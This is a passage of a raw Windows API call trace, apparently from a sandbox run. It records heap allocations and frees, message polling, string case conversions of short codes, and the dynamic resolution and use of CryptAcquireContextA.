hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.340] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0260.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0260.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.343] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0260.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0260.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0260.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0260.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.343] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0260.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0260.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0260.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.344] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0260.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.348] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.348] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0260.348] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.348] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0260.348] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.348] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.349] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.349] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.349] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.349] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.349] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.349] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.349] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.349] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.350] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.350] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.350] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.350] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.350] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.350] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0260.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0260.350] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0260.351] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.351] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0260.351] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.351] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.351] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.351] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.351] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.352] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.352] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.352] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.352] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.353] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0260.353] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.353] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.353] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.353] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.353] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.353] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.354] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.354] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.354] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) 